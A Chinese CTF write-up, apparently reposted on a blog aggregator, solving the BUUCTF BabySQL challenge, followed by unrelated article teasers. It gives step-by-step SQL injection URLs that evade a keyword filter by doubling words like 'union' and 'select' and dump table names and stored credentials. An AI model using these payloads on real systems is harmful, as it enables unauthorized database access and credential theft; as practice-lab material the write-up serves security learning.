buuctf web [极客大挑战 2019]BabySQL

buuctf web [极客大挑战 2019]BabySQL

news2024/10/4 16:35:44

又是你，还来？好好好

依旧老方法，先试探一手

有错误？

你有一个错误在你的SQL语法;检查与您的MariaDB服务器版本对应的手册，以便在第1行'1=1#'和password='1 "附近使用正确的语法

看来是or被过滤了，试试双写

双写可以绕过，这下就好办了，后面遇到同样被过滤的词，直接双写就🆗了

1、查看字段数

/check.php?username=1'oorrder bbyy 1%23&password=1'
/check.php?username=1'oorrder bbyy 2%23&password=1'
/check.php?username=1'oorrder bbyy 3%23&password=1'
/check.php?username=1'oorrder bbyy 4%23&password=1'

需要双写or和by

字段为1，2，3的时候页面显示为

字段为4报错

2、联合查询1，2，3字段

/check.php?username=1'ununionion seselectlect 1,2,3%23&password=1'

需要双写union和select

可以再页面上返回信息的是2，3字段

3、爆破当前的库、用户

/check.php?username=1'ununionion seselectlect 1,user(),database()%23&password=1'

需要双写union和select

4、爆破表

/check.php?username=1'ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23&password=1'

需要双写union、select、from、or、where

5、爆破b4bsql表

/check.php?username=1'ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'%23&password=1'

双写union、select、from、or、where、and

6、爆破表里的3个数据

/check.php?username=1'ununionion seselectlect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql%23&password=1

双写union、select、or、from

flag网页中显示并不完整，打开Shift+F12打开源码就能看到完整的flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1033201.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

五、核支持向量机算法(NuSVC，Nu-Support Vector Classification)（有监督学习）

五、核支持向量机算法(NuSVC，Nu-Support Vector Classification)（有监督学习）

和支持向量分类(Nu-Support Vector Classification)，与 SVC 类似，但使用一个参数来控制支持向量的数量，其实现基于libsvm 一、算法思路本质都是SVM中的一种优化，原理都类似，详细算法思路可以参考博文：三…

阅读更多...

Arcgis常用操作技巧

20个Arcgis常用操作技巧 1）影像格式的转换例如把jpg格式转换为tiff格式，可以在arctoolbox中的转换工具-->到光栅-->光栅到其他多种格式（conversiontools-->to Raster-->Raster to Other Format multiple）。矢量化…

阅读更多...

华为云云耀云服务器L实例评测 | minikube部署和使用

华为云云耀云服务器L实例评测 | minikube部署和使用

### 1 安装Docker 按照官网[Docker docs](https://docs.docker.com/engine/install/centos/)指引安装： shell yum install -y yum-utils yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo yum install docker-ce docker-…

阅读更多...

Apacha Flume

Apacha Flume

0目录 1.Flume概述 2.Flume安装部署 3.案例1 4.案例2 5.案例3 1.Flume概述 1.1 Flume定义 Flume是Cloudera提供的一个高可用的，高可靠的，分布式的海量日志采集、聚合和传输的系统。Flume基于流式架构，灵活简单。 1.2 Flume基础架构 Flume组…

阅读更多...

ubuntu22.04安装opencv4和opencv_contrib

ubuntu22.04安装opencv4和opencv_contrib

一、下载opencv和opencv_contrib 1、下载opencv Releases - OpenCV选择OpenCV-4.5.0，下载Sources版本，并解压； 2、下载opencv_contrib https://github.com/opencv/opencv_contrib选择右边Release-Tags，选择和opencv一样的版本&…

阅读更多...

计算机等级考试—信息安全三级真题三

计算机等级考试—信息安全三级真题三

目录一、单选题二、填空题三、综合题一、单选题

阅读更多...

Python 实现 PDF 文件转换为图片 / PaddleOCR

Python 实现 PDF 文件转换为图片 / PaddleOCR

文章用于学习记录文章目录前言一、PDF 文件转换为图片二、OCR 图片文字识别提取三、服务器端下载运行 PaddleOCR四、下载权重文件总结前言文字识别（Optical Character Recognition，简称OCR）是指将图片、扫描件或PDF、OFD文档中的打印字符…

阅读更多...

【zookeeper】zk选举、使用与三种节点简介，以及基于redis分布式锁的缺点的讨论

【zookeeper】zk选举、使用与三种节点简介，以及基于redis分布式锁的缺点的讨论

这里我准备了4台虚拟机，从node1到node4，其myid也从1到4. 一，zk server的启动和选举 zk需要至少启动3台Server，按照配置的myid，选举出参与选举的myid最大的server为Leader。（与redis的master、slave不同&a…

阅读更多...

微软在Windows 11推出Copilot，将DALL-E 3集成在Bing！

微软在Windows 11推出Copilot，将DALL-E 3集成在Bing！

美东时间9月21日，微软在美国纽约曼哈顿举办产品发布会，生成式AI成为重要主题之一。微软表示，Copilot将于9月26日在Windows 11中推出；Microsoft 365 Copilot 将于11 月1日向企业客户全面推出；将OpenAI最新的文本生成图…

阅读更多...

中兴R5300 G4服务器iSAC管理员zteroot密码遗失的重置方法及IPV6地址启用设置

中兴R5300 G4服务器iSAC管理员zteroot密码遗失的重置方法及IPV6地址启用设置

本文讲解中兴R5300 G4服务器BMC带外iSAC管理员zteroot密码遗失，无法登录时如何对其进行密码重置，以及iSAC启用IPV6地址的方法。一、重置中兴R5300 G4服务器iSAC管理员zteroot密码 1、通过SSH登录到iSAC，默认用户名：sysadmin&am…

阅读更多...

【STM32】IAP升级预备知识

【STM32】IAP升级预备知识

IAP（In Application Programming）简介 Flash够大的情况下，上电后的程序通过修改 MSP 的方式，可以在一块Flash上存在多个功能差异的程序。 IAP是为了在执行正常功能前，为了升级功能，提前运行的一段程序。这…

阅读更多...

如何判断用户的密码是否为强密码？

如何判断用户的密码是否为强密码？

点击下方关注我，然后右上角点击...“设为星标”，就能第一时间收到更新推送啦~~~ 用户设置的密码弱，会导致信息安全问题，一般的系统都要求设置强密码。今天的文章给大家介绍如何通过一个正则表达式来判断用户的密码是否为强密码。 …

阅读更多...

OpenHarmony应用核心技术理念与需求机遇简析

OpenHarmony应用核心技术理念与需求机遇简析

一、核心技术理念图片来源：OpenHarmony官方网站二、需求机遇简析新的万物互联智能世界代表着新规则、新赛道、新切入点、新财富机会;各WEB网站、客户端( 苹果APP、安卓APK)、微信小程序等上的组织、企业、商户等;OpenHarmony既是一次机遇、同时又是一次大的挑战&…

阅读更多...

【20230919】win11无法删除Chrome注册表项

【20230919】win11无法删除Chrome注册表项

win11无法删除Chrome注册表项删除以下注册表项发生错误： 计算机\HKEY_LOCAL_MACHINE\SOFTWAR\Google计算机\HKEY_CURRENT_USER\Software\Google 尝试了很多删除注册表方法（例如：编辑remove.reg文件），都不行。无法…

阅读更多...

近三年各领域数字孪生相关政策汇编（可下载）

近三年各领域数字孪生相关政策汇编（可下载）

自2021年国家“十四五”规划纲要提出“探索建设数字孪生城市”以来，国家发展和改革委员会、工业和信息化部、住房和城乡建设部、水利部、农业农村部等部门纷纷出台政策，大力推动数字孪生在千行百业的落地发展。这些政策不仅为数字孪生的应用提供了广阔的…

阅读更多...

OpenCV之怀旧图片

OpenCV之怀旧图片

原始图片图片模糊 Mat _blur;cv::GaussianBlur(src,_blur,Size(3,3),0); 图片锐化 Mat _sharp;Mat kernal Mat::zeros(3,3,CV_32FC1);kernal.at<float>(0,1) -1;kernal.at<float>(1,0) -1;kernal.at<float>(1,1) 5;kernal.at<float>(1,2) -1;ker…

阅读更多...

国内首家！阿里云 Elasticsearch 8.9 版本释放 AI 搜索新动能

国内首家！阿里云 Elasticsearch 8.9 版本释放 AI 搜索新动能

简介： 阿里云作为国内首家上线 Elasticsearch 8.9版本的厂商，在提供 Elasticsearch Relevance Engine™ (ESRE™) 引擎的基础上，提供增强 AI 的最佳实践与 ES 本身的混合搜索能力，为用户带来了更多创新和探索的可能性。近年来&a…

阅读更多...

47个Docker常见故障的原因和解决方式

47个Docker常见故障的原因和解决方式

本文针对Docker容器部署、维护过程中，产生的问题和故障，做出有针对性的说明和解决方案，希望可以帮助到大家去快速定位和解决类似问题故障。 Docker是一种相对使用较简单的容器，我们可以通过以下几种方式获取信息： 1、…

阅读更多...

搭建自己的搜索引擎之二

搭建自己的搜索引擎之二

一、前言接上篇搭建自己的搜索引擎之一 ，本篇主要讲ElasticSearch单实例安装配置。二、安装配置ElasticSearch ElasticSearch版本更新比较频繁，当前已经是8.0版本了，我这里安装的是7.1.1版本，其它版本详细说明可以查阅官方文…

阅读更多...

Ae 效果：CC Force Motion Blur

Ae 效果：CC Force Motion Blur

时间/CC Force Motion Blur Time/CC Force Motion Blur CC Force Motion Blur （CC 强制运动模糊）主要用于为动态图像添加强制的运动模糊效果，增加动态画面的流畅感和真实感。相对于时间轴面板上的“运动模糊”开关，CC Force Moti…

阅读更多...

推荐文章

最新文章